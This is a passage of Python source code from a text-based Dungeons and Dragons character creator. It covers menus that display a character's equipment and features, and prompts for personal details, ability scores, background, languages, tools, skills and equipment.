create_simple_list(character.languages)\n\n print('Languages spoken:')\n for language in character.languages:\n print(f'- {language.title()};')\n\n print('\\nPress ENTER to continue')\n input()\n\n elif answer == 'PROFICIENCY IN EQUIPMENTS':\n show_character_info(character)\n print('You have proficiency in the following equipment:')\n\n print('\\nArmors:')\n if len(character.proficiencies[\"ARMORS\"]) == 0:\n print('- No armor.')\n else:\n for armor in character.proficiencies[\"ARMORS\"]:\n print(f'- {armor.title()}')\n\n print('\\nWeapons:')\n if len(character.proficiencies[\"WEAPONS\"]) == 0:\n print('- No weapon.')\n else:\n for weapon in character.proficiencies[\"WEAPONS\"]:\n print(f'- {weapon.title()}')\n\n print('\\nTools:')\n if len(character.proficiencies[\"TOOLS\"]) == 0:\n print('- No tool.')\n else:\n for tool in character.proficiencies[\"TOOLS\"]:\n print(f'- {tool.title()}')\n\n print('\\nPress ENTER to continue')\n input()\n\n elif answer == 'EQUIPMENT':\n armors = get_dict_with_units(character.equipments['ARMORS'])\n weapons = get_dict_with_units(character.equipments['WEAPONS'])\n gears = get_dict_with_units(character.equipments[\n 'ADVENTURING GEARS'])\n tools = get_dict_with_units(character.equipments['TOOLS'])\n mounts = get_dict_with_units(character.equipments[\n 'MOUNTS AND VEHICLES'])\n trinkets = get_dict_with_units(character.equipments['TRINKETS'])\n\n show_character_info(character)\n\n if armors:\n print_name('Armors')\n print(\n 'Name Armor Class Weight '\n + 'Dex Max Strength Units'\n )\n for armor, units in armors.items():\n if armor.strength is False:\n strength = str(0)\n else:\n strength = str(armor.strength)\n\n if armor.dex_max is False:\n dex_max = str(armor.dex_max)\n else:\n dex_max = f' {armor.dex_max} '\n\n print(\n f'{armor.name.title():24s}'\n f'{str(armor.armor_class):12s}'\n f'{str(armor.weight):10s}'\n f'{dex_max:13s}'\n f'{strength:17s}'\n f'{units}'\n )\n print('\\n')\n\n if weapons:\n print_name('Weapons')\n print(\n 'Name Damage '\n 'Damage Type Weight Units'\n )\n for weapon, units in weapons.items():\n name = f'{weapon.name.title():19s}'\n damage = f'{convert_dice_to_d_format(weapon.damage):9s}'\n damage_type = f'{weapon.damage_type:30s}'\n weight = f'{weapon.weight} lb.'\n weight = f'{weight:18s}'\n print(name + damage + damage_type + weight + str(units))\n print('\\n')\n\n if gears:\n print_name('Adventuring Gears')\n print('Name' + ' ' * 50 + 'Weight (lb.)' + ' ' * 8 + 'Units')\n for gear, units in gears.items():\n print(\n f'{gear.name.title():59s}'\n f'{str(gear.weight):17s}'\n f'{units}'\n )\n print('\\n')\n\n if tools:\n print_name('Tools')\n print('Name' + ' ' * 50 + 'Weight (lb.)' + ' ' * 8 + 'Units')\n for tool, units in tools.items():\n print(\n f'{tool.name.title():59s}'\n f'{str(tool.weight):17s}'\n f'{units}'\n )\n print('\\n')\n\n if mounts:\n print_name('Mounts and Vehicles')\n for mount in mounts:\n print(f'- {mount.name.title()}')\n print('\\n')\n\n if trinkets:\n print_name('Trinkets')\n for trinket in trinkets:\n print(f'- {trinket.name.title()}')\n print('\\n')\n\n print_name('WEIGHT')\n print(f'Total weight carried: {character.equipments[\"WEIGHT\"]}')\n if character.equipments['WEIGHT'] \\\n > character.abilities.values['STR'] * 15:\n print('You are carrying way too much. 
Keep it easy, man!')\n else:\n print('You are carrying just fine!')\n print('')\n\n print_name()\n print('Press ENTER to continue')\n input()\n\n elif answer == 'FEATURES':\n show_character_info(character)\n\n print_name('Racial Features')\n if character.features['RACE']:\n for feature in character.features['RACE']:\n print(f'- {feature.title()}')\n else:\n print('Nothing to show here!')\n print('\\n')\n\n print_name('Class Features')\n if character.features['CLASS']:\n for feature in character.features[\"CLASS\"]:\n print(f'- {feature.title()}')\n else:\n print('Nothing to show here!')\n print('\\n')\n\n print_name('Background Feature')\n if character.features['BACKGROUND']:\n for feature in character.features[\"BACKGROUND\"]:\n print(f'- {feature.title()}')\n else:\n print('Nothing to show here!')\n print('\\n')\n\n print_name('Advantages')\n if character.features['ADVANTAGES']:\n for advantage in character.features['ADVANTAGES']:\n print(f'- {advantage.title()}')\n else:\n print('Nothing to show here!')\n print('\\n')\n\n print_name('Disadvantages')\n if character.features['DISADVANTAGES']:\n for disadvantages in character.features['DISADVANTAGES']:\n print(f'- {disadvantages.title()}')\n else:\n print('Nothing to show here!')\n print('\\n')\n\n print_name('Resistances')\n if character.features['RESISTANCES']:\n for resistance in character.features['RESISTANCES']:\n print(f'- {resistance.title()}')\n else:\n print('Nothing to show here!')\n print('\\n')\n\n print('Press ENTER to continue.')\n input()\n\n elif answer == 'PERSONAL INFO':\n show_character_info(character)\n\n print_name('Physical appearance')\n print(\n 'Age Eye Color Skin Color '\n 'Hair Color Height Weight'\n )\n print(\n f'{set_string_size(character.personal_info[\"AGE\"], 9)}'\n f'{set_string_size(character.personal_info[\"EYE\"], 15)}'\n f'{set_string_size(character.personal_info[\"SKIN\"], 16)}'\n f'{set_string_size(character.personal_info[\"HAIR\"], 16)}'\n f'{set_string_size(character.personal_info[\"HEIGHT\"], 12)}'\n f'{set_string_size(character.personal_info[\"WEIGHT\"], 12)}'\n f'\\n'\n )\n\n backgrounds_speciality = {\n 'CHARLATAN': 'FAVORITE SCHEME',\n 'CRIMINAL': 'CRIMINAL SPECIALITY',\n 'SPY': 'CRIMINAL SPECIALITY',\n 'ENTERTAINER': 'ENTERTAINER ROUTINES',\n 'GLADIATOR': 'ENTERTAINER ROUTINES',\n 'FOLK HERO': 'DEFINING EVENT',\n 'GUILD ARTISAN': 'GUILD BUSINESS',\n 'GUILD MERCHANT': 'GUILD BUSINESS',\n 'HERMIT': 'LIFE OF SECLUSION',\n 'OUTLANDER': 'ORIGIN',\n 'SAGE': 'SPECIALTY',\n 'SOLDIER': 'SPECIALTY',\n }\n\n print_name(\"Psychological traits\")\n if character.general_info['BACKGROUND'] in backgrounds_speciality:\n background_speciality = \\\n backgrounds_speciality[character.general_info['BACKGROUND']]\n\n print(\n f'{background_speciality.title()}: '\n f'{character.psychology[\"BACKGROUND SPECIALITY\"]}'\n f'\\n'\n )\n\n print(\n f'Personality trait: '\n f'{character.psychology[\"PERSONALITY TRAIT\"]}\\n'\n )\n print(f'Ideal: {character.psychology[\"IDEAL\"]}\\n')\n print(f'Bond: {character.psychology[\"BOND\"]}\\n')\n print(f'Flaw: {character.psychology[\"FLAW\"]}\\n')\n\n print_name('History')\n print('')\n for line in character.personal_info['HISTORY']:\n print(line)\n\n print('')\n print('Press ENTER to continue')\n input()\n\n elif answer == 'SPELLS':\n if character.magical_ability.has_magic:\n result = check_spells(character)\n if result is None:\n show_character_info(character)\n show_spells(character)\n elif result == 'EXIT':\n return result\n else:\n show_character_info(character)\n print('It 
appears that your character has no coward magic!')\n            print('Go out there and smash their heads!')\n            print('Press ENTER to continue')\n            input()\n\n        clear_terminal()\n\n\ndef get_history():\n    clear_terminal()\n    print(\"What is your character's history?\")\n\n    history = []\n    new_paragraph = None\n    while new_paragraph != '':\n        new_paragraph = input()\n        history.append(new_paragraph)\n\n    return history[:-1]\n\n\ndef get_player_name():\n    name = input('What is your name? ')\n    clear_terminal()\n\n    return name\n\n\ndef get_name():\n    confirmed = False\n    name = ''\n\n    while not confirmed:\n        name = input(\"What is your character's name? \")\n\n        print(f'\\nYou typed: {name}.')\n\n        valid_answer = False\n        while not valid_answer:\n            confirmation = input('Do you confirm it? YES or NO? ')\n            confirmation = confirmation.upper()\n\n            if confirmation == 'YES' or confirmation == 'Y':\n                valid_answer = True\n                confirmed = True\n            elif confirmation == 'NO' or confirmation == 'N':\n                valid_answer = True\n            else:\n                print('\\nPlease type only YES or NO')\n\n        clear_terminal()\n\n    return name.upper()\n\n\ndef get_age(race):\n    prompt = \\\n        f\"Typically, an adult {race.name} is between {race.age[0]} and \" \\\n        f\"{race.age[1]} years old.\\n\" \\\n        \"What is your character's age?\"\n    age = get_a_number(prompt=prompt, go_back_message=False)\n    age = str(age)\n\n    return age\n\n\ndef get_height(race):\n    text = f'Typically, a {race.name} is between {race.height[0]}\\' and ' \\\n           f'{race.height[1]}\\' tall.\\n' \\\n           f'What is your character\\'s height?'\n    height = get_a_number(prompt=text, go_back_message=False)\n    height = str(height)\n\n    return height\n\n\ndef get_weight():\n    weight = get_a_number(\n        prompt=\"What is your character's weight?\",\n        go_back_message=False)\n    weight = str(weight)\n\n    return weight\n\n\ndef get_eye_color():\n    clear_terminal()\n    eye = input('What is your character\\'s eye color?\\n')\n    return eye\n\n\ndef get_skin_color():\n    clear_terminal()\n    skin = input('What is your character\\'s skin color?\\n')\n    return skin\n\n\ndef get_hair_color():\n    clear_terminal()\n    hair = input('What is your character\\'s hair color?\\n')\n    return hair\n\n\ndef get_personal_info(race):\n    \"\"\"\n    Asks the user for the character's personal details\n    :param race: Race object, used to suggest typical age and height ranges\n    :return: Dict with all data gathered in the function\n    \"\"\"\n    player_name = get_player_name()\n    character_name = get_name()\n    age = get_age(race)\n    height = get_height(race)\n    weight = get_weight()\n    eyes_color = get_eye_color()\n    skin_color = get_skin_color()\n    hair_color = get_hair_color()\n    history = get_history()\n\n    personal_info = {\n        \"PLAYER'S NAME\": player_name,\n        \"CHARACTER'S NAME\": character_name,\n        \"AGE\": age,\n        \"HEIGHT\": height,\n        \"WEIGHT\": weight,\n        \"EYE\": eyes_color,\n        \"SKIN\": skin_color,\n        \"HAIR\": hair_color,\n        \"HISTORY\": history\n    }\n\n    return personal_info\n\n\ndef generate_random_values():\n    \"\"\"\n    Generates the six random ability scores (4d6 each, dropping the lowest\n    die) and rerolls the whole set until it passes the quality check below\n    :return: list: all the random values\n    \"\"\"\n    die = Dice(1, 6) # Creates a d6\n\n    def correct_values(values):\n        \"\"\"\n        Checks the values against the conditions that mark them as acceptable\n        :param values: The list with the 6 values generated randomly\n        :return: bool: If the values are correct or not\n        \"\"\"\n        if not values:\n            return False\n        else:\n            modifiers = [] # A list with all the modifiers from the abilities\n            biggest_value = 0\n\n            for number in values:\n                modifier = floor((number - 10) / 2)\n                
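# standard 5e ability modifier: floor((score - 10) / 2), e.g. 15 -> +2, 8 -> -1\n                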
modifiers.append(modifier)\n\n                if number > biggest_value:\n                    biggest_value = number\n\n            # If the sum of modifiers is less than 3, the values must be redone\n            if sum(modifiers) < 3:\n                return False\n            else:\n                return True\n\n    scores = []\n    while not correct_values(scores):\n        scores = []\n\n        for _ in range(1, 7):\n            dice = []\n\n            for _ in range(1, 5):\n                # Roll the dice to generate the random value from 1 to 6\n                value = die.roll(0)\n                dice.append(value)\n\n            # Remove the die with the lowest value from the list\n            dice.sort()\n            dice.pop(0)\n\n            scores.append(sum(dice)) # Store the sum of the 3 dice\n\n    return scores\n\n\ndef show_major_abilities(classe):\n    \"\"\"\n    Every class has its most important abilities. This function prints the ones\n    listed in the Player's Handbook, so the user can make a better choice.\n    :param classe: String representing the class chosen by the user\n    \"\"\"\n    abilities = []\n\n    if isinstance(classe, Class):\n        classe = classe.name\n\n    if classe == 'BARBARIAN':\n        abilities = [['STR'], ['CON']]\n    elif classe == 'BARD':\n        abilities = [['CHA'], ['DEX']]\n    elif classe == 'CLERIC':\n        abilities = [['WIS'], ['STR', 'CON']]\n    elif classe == 'DRUID':\n        abilities = [['WIS'], ['CON']]\n    elif classe == 'FIGHTER':\n        abilities = [['STR', 'DEX'], ['CON', 'INT']]\n    elif classe == 'MONK':\n        abilities = [['DEX'], ['WIS']]\n    elif classe == 'PALADIN':\n        abilities = [['STR'], ['CHA']]\n    elif classe == 'RANGER':\n        abilities = [['DEX'], ['WIS']]\n    elif classe == 'ROGUE':\n        abilities = [['DEX'], ['INT', 'CHA']]\n    elif classe == 'SORCERER':\n        abilities = [['CHA'], ['CON']]\n    elif classe == 'WARLOCK':\n        abilities = [['CHA'], ['CON']]\n    elif classe == 'WIZARD':\n        abilities = [['INT'], ['CON', 'DEX', 'CHA']]\n\n    print('Recommended for your major ability:')\n    for ability in abilities[0]:\n        print(f'- {ability}')\n    print('')\n\n    print('Recommended for your second major ability:')\n    for ability in abilities[1]:\n        print(f'- {ability}')\n    print('')\n\n\ndef get_abilities_values(values, classe):\n    \"\"\"\n    Allows the user to assign the desired values of their abilities.\n    :param values: A list of the values generated for the user.\n    :param classe: String with the name of the class selected by the user\n    :return: Dictionary containing the values assigned by the user\n    \"\"\"\n\n    abilities = {\n        'STR': 'Strength',\n        'DEX': 'Dexterity',\n        'CON': 'Constitution',\n        'INT': 'Intelligence',\n        'WIS': 'Wisdom',\n        'CHA': 'Charisma'\n    }\n    new_values = {}\n\n    for ability_short, ability_name in abilities.items():\n        end = False\n        while not end:\n            print(f'Your ability scores are: {values}')\n            print('Choose wisely!\\n')\n\n            show_major_abilities(classe)\n\n            if new_values:\n                for ability, value in new_values.items():\n                    print(\n                        f'Insert the value of {abilities[ability].title()}: '\n                        f'{value}'\n                    )\n\n            value = input(f'Insert the value of {ability_name.title()}: ')\n            if value.isnumeric():\n                value = int(value)\n\n                if value in values:\n                    values.remove(value)\n                    new_values[ability_short] = value\n                    end = True\n                else:\n                    clear_terminal()\n                    print(\n                        'This value is not in your random values. '\n                        'Please try again'\n                    )\n            else:\n                clear_terminal()\n                print(\n                    \"Your answer doesn't look like a number. 
\"\n 'Please try again'\n )\n\n clear_terminal()\n\n return new_values\n\n\ndef buy_points(classe):\n clear_terminal()\n\n total_points = 27\n points_spent = 0\n values = {\n 'STR': 8,\n 'DEX': 8,\n 'CON': 8,\n 'INT': 8,\n 'WIS': 8,\n 'CHA': 8\n }\n\n confirmed = False\n while not confirmed:\n left_points = total_points - points_spent\n\n options = {\n f'Strength: {values[\"STR\"]}': 'STR',\n f'Dexterity: {values[\"DEX\"]}': 'DEX',\n f'Constitution: {values[\"CON\"]}': 'CON',\n f'Intelligence: {values[\"INT\"]}': 'INT',\n f'Wisdom: {values[\"WIS\"]}': 'WIS',\n f'Charisma: {values[\"CHA\"]}': 'CHA',\n f'Confirm values': 'CONFIRM'\n }\n\n show_major_abilities(classe)\n ability = select(\n options=options,\n prompt=f'You have {left_points} points to spend.',\n show_type='key',\n return_type='value',\n clean=False,\n single_item=True,\n go_back=False,\n finish=False,\n )\n\n if ability != 'CONFIRM':\n print('')\n print('Ability score point cost')\n\n point_cost = {\n 8: 0, 9: 1, 10: 2, 11: 3, 12: 4, 13: 5, 14: 7, 15: 9\n }\n scores = ''\n costs = ''\n\n for point, cost in point_cost.items():\n scores += f'{str(point):10s}'\n costs += f'{str(cost):10s}'\n\n print('')\n print(scores)\n print(costs)\n print('')\n\n old_value = values[ability]\n new_value = input(f'Type the new {ability.title()} value: ')\n if not new_value.isnumeric:\n print('\\nValue must be a number.')\n print('Press ENTER and try again.')\n input()\n elif int(new_value) not in point_cost:\n print('\\nValue not found in the table.')\n print('Press ENTER and try again.')\n input()\n else:\n new_value = int(new_value)\n if points_spent \\\n - point_cost[old_value] \\\n + point_cost[new_value] \\\n < 0:\n print('You don\\'t have the points to buy this value.')\n print('Press ENTER and try again.')\n input()\n else:\n points_spent -= point_cost[old_value]\n points_spent += point_cost[new_value]\n values[ability] = new_value\n else:\n confirmed = True\n\n clear_terminal()\n\n return values\n\n\ndef get_existing_abilities_values(abilities, ability_increase):\n values = []\n for ability, value in abilities.values.items():\n if ability in ability_increase:\n values.append(\n value - ability_increase[ability]\n )\n else:\n values.append(value)\n\n return values\n\n\ndef create_abilities(classe, race, abilities=None):\n clear_terminal()\n\n if abilities is None:\n options = [\n 'GENERATE RANDOM VALUES',\n 'USE DEFAULT VALUES',\n 'BUY ABILITIES POINTS'\n ]\n\n answer = select(\n options=options,\n prompt='There are three different ways to '\n 'generate the values of your character',\n single_item=True,\n )\n clear_terminal()\n else:\n options = ['DISTRIBUTE AGAIN', 'USE IT IN THE SAME WAY']\n answer = select(\n options=options,\n prompt='You already generated values for this character. 
Select '\n                   'what you want to do with them now.',\n            single_item=True\n        )\n        clear_terminal()\n\n    if answer == 'GO BACK' or answer == 'EXIT':\n        return answer\n    else:\n        if answer == 'BUY ABILITIES POINTS':\n            values = buy_points(classe)\n        else:\n            values = None\n            if abilities:\n                values = get_existing_abilities_values(\n                    abilities, race.ability_increase)\n            elif answer == 'GENERATE RANDOM VALUES':\n                if config['DICE ROLL'] == 'VIRTUAL':\n                    values = generate_random_values()\n                else: # config['DICE ROLL'] == 'PHYSICAL'\n                    print('In your configurations, you selected '\n                          'to roll physical dice.')\n                    print('For your abilities, you must roll 4d6 '\n                          'and discard the lowest die.')\n                    print('Type the sum of the other 3 as a single value.')\n                    print(\"NOTE: The order doesn't matter just yet.\\n\")\n                    print('Press ENTER to start typing your values...')\n                    input()\n\n                    values = get_typed_dice(\n                        dice=Dice(number=3, maximum=6),\n                        times=6\n                    )\n            elif answer == 'USE DEFAULT VALUES':\n                values = [15, 14, 13, 12, 10, 8]\n\n            if answer != 'USE IT IN THE SAME WAY':\n                values = get_abilities_values(values, classe)\n            elif answer == 'USE IT IN THE SAME WAY':\n                acronyms = ['STR', 'DEX', 'CON', 'INT', 'WIS', 'CHA']\n                new_values = {}\n                for i in range(6):\n                    new_values[acronyms[i]] = values[i]\n                values = new_values\n\n        abilities = Abilities(\n            values['STR'],\n            values['DEX'],\n            values['CON'],\n            values['INT'],\n            values['WIS'],\n            values['CHA']\n        )\n\n        if 'TWO ABILITIES INCREASE' in race.features:\n            abilities_options = index['ABILITIES'].copy()\n            abilities_options.pop('CHA')\n\n            abilities_to_increase = select(\n                options=abilities_options,\n                quantity=2,\n                prompt=f'As a {race.name}, you can choose the abilities in '\n                       'which you have an increase in value.',\n                show_type='value',\n                return_type='key',\n                go_back=False,\n                finish=False,\n            )\n\n            for ability in abilities_to_increase:\n                race.ability_increase[ability] = 1\n\n            for ability, increase in race.ability_increase.items():\n                abilities.increment_ability(ability=ability, value=increase)\n\n        return abilities\n\n\ndef choose_or_bought():\n    # The rules on equipment have variants, so the user can choose if he/she\n    # wants to buy the equipment with an amount of money defined by the class\n    # or to select it from the possible options given by the class and\n    # background\n    answer = select(\n        options=['BUY', 'CHOOSE'],\n        prompt='You may BUY or CHOOSE your equipment, what would you like?',\n        single_item=True,\n    )\n\n    if answer == 'BUY':\n        equipment_bought = True\n    elif answer == 'CHOOSE':\n        equipment_bought = False\n    else:\n        equipment_bought = answer\n\n    clear_terminal()\n\n    return equipment_bought\n\n\ndef unite_proficiency(*proficiency):\n    final_list = []\n    for a_list in proficiency:\n        for element in a_list:\n            element_value = find_in_dict(element, index)\n            if element_value is not None:\n                if isinstance(element_value, list) \\\n                        or isinstance(element_value, dict) \\\n                        or isinstance(element_value, tuple):\n                    new_list = create_simple_list(element_value)\n                else:\n                    new_list = [element_value]\n\n                for item in new_list:\n                    if item.name not in final_list:\n                        final_list.append(item.name)\n\n    return final_list\n\n\ndef race_magic(race_name, level, magical_ability):\n    # magical_ability.spells maps spell level -> list of spell names, so\n    # membership is checked against the flattened list of names; spells are\n    # passed as {level: [names]} to match the format built in select_spells\n    known_spells = [\n        spell for spells in magical_ability.spells.values()\n        for spell in spells\n    ]\n\n    if race_name == 'DARK ELF':\n        if 'DANCING LIGHTS' not in magical_ability.cantrips:\n            magical_ability.cantrips.append('DANCING LIGHTS')\n\n        if level >= 3:\n            if 'FAERIE FIRE' not in known_spells:\n                magical_ability.set_spells({1: ['FAERIE FIRE']})\n\n        if level >= 5:\n            if 'DARKNESS' not in known_spells:\n                magical_ability.set_spells({2: ['DARKNESS']})\n\n    if race_name == 'TIEFLING':\n        if 'THAUMATURGY' not in magical_ability.cantrips:\n            magical_ability.cantrips.append('THAUMATURGY')\n\n        if level >= 3:\n            if 'HELLISH REBUKE' not in known_spells:\n                magical_ability.set_spells({1: ['HELLISH REBUKE']})\n\n        if level >= 5:\n            if 'DARKNESS' not in known_spells:\n                magical_ability.set_spells({2: ['DARKNESS']})\n\n\ndef get_alignment():\n    # Get alignment\n    alignment = select(\n        options=index['ALIGNMENTS'],\n        prompt='In Dungeons and Dragons, there are 9 possible alignments.',\n        single_item=True\n    )\n    clear_terminal()\n\n    return alignment\n\n\ndef select_background():\n    # Get background name\n    background = select(\n        options=index['BACKGROUNDS'] + ['GO BACK', 'EXIT'],\n        prompt='In Dungeons and Dragons, there are 13 possible backgrounds.',\n        single_item=True\n    )\n    clear_terminal()\n\n    if background == 'ACOLYTE':\n        chosen_equipment = [\n            book, clothes['COSTUME'], clothes['COMMON'],\n            pouch, incense, incense, incense, incense, incense\n        ]\n\n        background = Acolyte(\n            equipment=chosen_equipment,\n            equipment_options=[[holy_symbol]],\n        )\n\n    elif background == 'CHARLATAN':\n        background = Charlatan(\n            equipment=[clothes['COMMON'], disguise_kit, pouch],\n            equipment_options=[[tools_of_the_con]],\n        )\n\n    elif background == 'CRIMINAL':\n        background = Criminal(\n            equipment=[crowbar, clothes['COMMON'], pouch],\n            variant=get_variant('SPY'),\n        )\n\n    elif background == 'ENTERTAINER':\n        equipments_options = [\n            [\n                index['EQUIPMENT']['TOOLS']['MUSICAL INSTRUMENT']\n            ],\n            [\n                admirer_favor,\n            ]\n        ]\n        background = Entertainer(\n            equipment=[clothes['COSTUME'], pouch, guild_letter],\n            equipment_options=equipments_options,\n            variant=get_variant('GLADIATOR'),\n        )\n\n    elif background == 'FOLK HERO':\n        chosen_equipment = [\n            shovel, iron_pot, clothes['COMMON'],\n            pouch, guild_letter, clothes['TRAVELER\\'S']\n        ]\n        background = FolkHero(\n            equipment=chosen_equipment,\n            equipment_options=[[artisans_tools]],\n        )\n\n    elif background == 'GUILD ARTISAN':\n        background = GuildArtisan(\n            equipment=[clothes['TRAVELER\\'S'], pouch],\n            equipment_options=[[artisans_tools]],\n            variant=get_variant('GUILD MERCHANT'),\n        )\n\n    elif background == 'HERMIT':\n        chosen_equipment = [\n            clothes['COMMON'],\n            herbalism_kit,\n            map_or_scroll_case,\n            winter_blanket,\n        ]\n        background = Hermit(\n            equipment=chosen_equipment,\n        )\n\n    elif background == 'NOBLE':\n        variant = get_variant('KNIGHT')\n        chosen_equipment = [\n            clothes['FINE'], signet_ring, pouch, scroll_pedigree\n        ]\n        background = Noble(\n            equipment=chosen_equipment,\n            variant=variant,\n        )\n\n    elif background == 'OUTLANDER':\n        chosen_equipment = [\n            druidic_focus['WOODEN\\'S STAFF'],\n            hunting_trap,\n            animal_trophy,\n            clothes['TRAVELER\\'S'],\n            pouch\n        ]\n        background = Outlander(\n            equipment=chosen_equipment,\n        )\n\n    elif background == 'SAGE':\n        chosen_equipment = [\n            ink, letter_from_colleague, clothes['COMMON'], pouch\n        ]\n        background = Sage(equipment=chosen_equipment)\n\n    elif background == 'SAILOR':\n        background = Sailor(\n            equipment=[club, silk_rope, lucky_charm, clothes['COMMON'], pouch],\n            variant=get_variant('PIRATE'),\n        )\n\n    elif background == 'SOLDIER':\n        background = Soldier(\n            equipment=[insignia_rank, enemy_trophy, clothes['COMMON'], pouch],\n        )\n\n    elif background == 'URCHIN':\n        chosen_equipment = [\n            small_knife, city_map, pet_mouse,\n            parents_token, clothes['COMMON'], pouch\n        ]\n        background = Urchin(equipment=chosen_equipment)\n\n    return background\n\n\ndef select_new_languages(background, race):\n    
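# background.languages holds the number of bonus languages; a racial\n    # EXTRA LANGUAGE feature below adds one more choice\n    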
new_languages = background.languages\n    # iterate over a copy so removing the feature doesn't skip items\n    for feature in race.features.copy():\n        if feature == 'EXTRA LANGUAGE':\n            new_languages += 1\n            race.features.remove(feature)\n\n    language_options = index['LANGUAGES'].copy()\n    for language in race.languages:\n        language_options.remove(language)\n\n    new_languages = select(\n        options=language_options,\n        quantity=new_languages,\n        prompt='You can choose new languages!'\n    )\n    clear_terminal()\n\n    if new_languages not in ['EXIT', 'GO BACK']:\n        languages = race.languages + new_languages\n    else:\n        languages = new_languages\n\n    return languages\n\n\ndef select_proficient_tool(race, classe, background):\n    cont = True\n    tools = None\n    race_tools = None\n    class_tools = None\n    back_tools = None\n\n    if race.tools_options and cont:\n        race_tools = select(\n            options=race.tools_options,\n            quantity=race.number_tools,\n            prompt=f'As a {race.name}, choose the tools you are '\n                   f'proficient with.'\n        )\n\n        cont = 'EXIT' not in race_tools and 'GO BACK' not in race_tools\n\n        if not cont:\n            if 'EXIT' in race_tools:\n                tools = 'EXIT'\n            else:\n                tools = 'GO BACK'\n\n    if classe.tools_options and cont:\n        class_tools = select(\n            options=classe.tools_options,\n            quantity=classe.number_tools,\n            prompt=f'As a {classe.name}, choose the tools you are '\n                   f'proficient with.',\n        )\n\n        cont = 'EXIT' not in class_tools and 'GO BACK' not in class_tools\n\n        if not cont:\n            # check the answer just given, not the still-unset tools variable\n            if 'EXIT' in class_tools:\n                tools = 'EXIT'\n            else:\n                tools = 'GO BACK'\n\n    if background.tools_options and cont:\n        back_tools = select(\n            options=background.tools_options,\n            quantity=background.number_tools,\n            prompt=f'As a {background.name}, choose the tools you are '\n                   f'proficient with.',\n        )\n\n        cont = 'EXIT' not in back_tools and 'GO BACK' not in back_tools\n\n        if not cont:\n            if 'EXIT' in back_tools:\n                tools = 'EXIT'\n            else:\n                tools = 'GO BACK'\n\n    if cont:\n        # build the result even when the background offers no tools, so the\n        # race and class choices are not lost\n        tools = {\n            'RACE': race_tools,\n            'CLASS': class_tools,\n            'BACKGROUND': back_tools\n        }\n\n    return tools\n\n\ndef select_skills(\n        race,\n        classe,\n        background\n):\n    cont = True\n    all_skills = None\n    classe_skills_proficiency = []\n    if 'SKILL VERSATILITY' in race.features:\n        race.skills_proficiency = []\n\n    default_skills = race.skills_proficiency + background.skills\n    skill_options = index['SKILLS'].copy()\n    skill_options = list(skill_options.keys())\n\n    for skill in default_skills:\n        if skill in skill_options:\n            skill_options.remove(skill)\n        else:\n            raise Exception('All skills in default skills must be in index!')\n\n    if classe.possible_skills:\n        skill_options = classe.possible_skills.copy()\n\n        for skill in default_skills:\n            if skill in skill_options:\n                skill_options.remove(skill)\n\n        new_skills = select(\n            options=skill_options,\n            quantity=classe.number_skills,\n            prompt=f'As a {classe.name}, you can choose skills to be proficient in'\n        )\n\n        cont = 'EXIT' not in new_skills and 'GO BACK' not in new_skills\n\n        if cont:\n            for skill in new_skills:\n                skill_options.remove(skill)\n\n            classe_skills_proficiency += new_skills\n        elif 'EXIT' in new_skills:\n            all_skills = 'EXIT'\n        elif 'GO BACK' in new_skills:\n            all_skills = 'GO BACK'\n\n    if cont:\n        if 'SKILL VERSATILITY' in race.features:\n            new_skills = select(\n                options=skill_options,\n                quantity=2,\n                prompt=f'As a {race.name}, you can choose the '\n                       f'skills you are proficient in.',\n            )\n\n            cont = 'EXIT' not in new_skills and 'GO BACK' not in new_skills\n            if cont:\n                race.skills_proficiency = new_skills\n            elif 'EXIT' in new_skills:\n                all_skills = 'EXIT'\n            elif 'GO BACK' in new_skills:\n                all_skills = 'GO BACK'\n\n    if cont:\n        classe.skills_proficiency = 
classe_skills_proficiency\n all_skills = race.skills_proficiency \\\n + classe.skills_proficiency \\\n + background.skills\n\n return all_skills\n\n\ndef group_equipment(equipments):\n if 'WEAPONS' not in equipments:\n weapons = []\n armors = []\n trinkets = []\n tools = []\n mounts = []\n gear = []\n total_weight = 0\n\n for equipment in equipments:\n if isinstance(equipment, Weapon):\n weapons.append(equipment)\n elif isinstance(equipment, Armor):\n armors.append(equipment)\n elif isinstance(equipment, Trinket):\n trinkets.append(equipment)\n elif isinstance(equipment, Tool):\n tools.append(equipment)\n elif isinstance(equipment, MountsAndVehicles):\n mounts.append(equipment)\n elif isinstance(equipment, AdventuringGear):\n gear.append(equipment)\n else:\n raise Exception('It appears something went wrong!\\n'\n 'Error: group_equipment')\n\n if equipment.weight is not None:\n total_weight += equipment.weight\n\n equipments = {\n 'ARMORS': armors,\n 'WEAPONS': weapons,\n 'ADVENTURING GEARS': gear,\n 'TOOLS': tools,\n 'MOUNTS AND VEHICLES': mounts,\n 'TRINKETS': trinkets,\n 'WEIGHT': total_weight,\n 'ARMOR EQUIPPED': [],\n 'SHIELD EQUIPPED': False\n }\n\n return equipments\n\n\ndef select_equipment(classe, background):\n equipments = None\n end = False\n while not end:\n equipment_choices = classe.equipment_options \\\n + background.equipment_options\n equipment_bought = choose_or_bought()\n\n if equipment_bought == 'EXIT':\n equipments = 'EXIT'\n elif equipment_bought == 'GO BACK':\n equipments = 'GO BACK'\n\n new_wealth = -1\n if equipment_bought is True:\n equipments, new_wealth = buy_equipment(classe.starting_wealth)\n\n elif equipment_bought is False:\n classe.wealth = -1\n equipments = choose_equipment(equipment_choices)\n\n if equipments != 'GO BACK' \\\n and equipments != 'EXIT' \\\n and equipments is not None:\n equipments = create_simple_list(equipments)\n equipments = group_equipment(equipments)\n\n clear_terminal()\n print('You have chosen:\\n')\n for category, items in equipments.items():\n if isinstance(items, list) and len(items) > 0:\n print_name(category)\n\n items_units = {}\n for item in items:\n try:\n items_units[item] += 1\n except KeyError:\n items_units[item] = 1\n\n for item, units in items_units.items():\n print(f'- {item.name.title()} x{units}')\n print('')\n\n answer = select(\n options=['CONFIRM', 'RESTART'],\n prompt='Select what you want to do with this equipment:',\n single_item=True,\n clean=False,\n )\n\n if answer == 'CONFIRM':\n end = True\n\n if new_wealth != -1:\n classe.wealth = new_wealth\n elif answer in ['GO BACK', 'EXIT']:\n equipments = answer\n\n elif equipments == 'EXIT':\n end = True\n\n elif equipments == 'GO BACK':\n end = True\n\n if end and equipments != 'EXIT' and equipments != 'GO BACK':\n equipments['TRINKETS'] = [random_trinket()]\n\n return equipments\n\n\ndef loop_through_functions(variables, functions_order):\n last_choice = None\n function_number = 0\n\n while function_number < len(functions_order):\n function_info = functions_order[function_number]\n variable_key = function_info[0]\n function = function_info[1]\n parameters_keys = function_info[2]\n asks_user = function_info[3]\n\n parameters = []\n for key in parameters_keys:\n parameters.append(variables[key])\n\n result = function(*parameters)\n\n if last_choice == 'GO 